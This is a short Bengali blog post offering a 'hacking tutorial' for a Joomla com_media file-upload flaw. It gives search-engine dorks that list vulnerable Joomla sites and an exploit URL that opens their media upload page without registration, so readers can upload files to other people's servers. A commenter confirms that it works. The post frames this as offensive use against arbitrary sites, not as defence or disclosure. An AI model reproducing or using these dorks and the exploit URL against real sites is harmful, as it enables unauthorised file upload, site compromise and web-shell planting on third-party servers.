হ্যাকিং টিউটোরিয়াল :: জুমলা এক্সপ্লয়েট (পার্ট - ১)

আসসালামু আলাইকুম,

আজ আমি আপনাদের একটি জুমলা এক্সপ্লয়েট ব্যবহার করে দেখাবো,
এটি মূলত জুমলা সাইট থেকে আপলোড ইনডেক্স বাগ বের করে দেয়।

এর ফলে আপনি কোন জুমলা সাইটের সার্ভারে ফাইল আপলোড করার চান্স পাবেন।


প্রথমে গুগোল বা অন্যান্য সার্চ এঞ্জিনে  inurl:"com_media" intext:"caption" site:com -en-GB.com_media.ini লিখে এন্টার দিন। এতে সব জুমলা সাইটের আপলোড ইনডেক্স আসতে থাকবে। তখন কোন লিঙ্কে ক্লিক করলেই আপনি আপলোড ইনডেক্স পেজ পেয়ে যাবেন, এবং রেজিস্টার ছাড়াই ফাইল আপলোড করতে পারবেন।


  ....  

Component Name : Com_Media

Vulnerabilty : File Upload

Dork 1: 

inurl:"com_media" intext:"caption" site:com -en-GB.com_media.ini

Dork 2: inurl:index.php?option=com_media


Exploit: 

http://targetdomain.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=


ফেসবুকে আমি




শেয়ার করুন

লেখকঃ

পূর্ববর্তী পোষ্ট
পরবর্তী পোষ্ট
3:12 PM

ভালই কাজ করে COM_MEDIA

Reply
avatar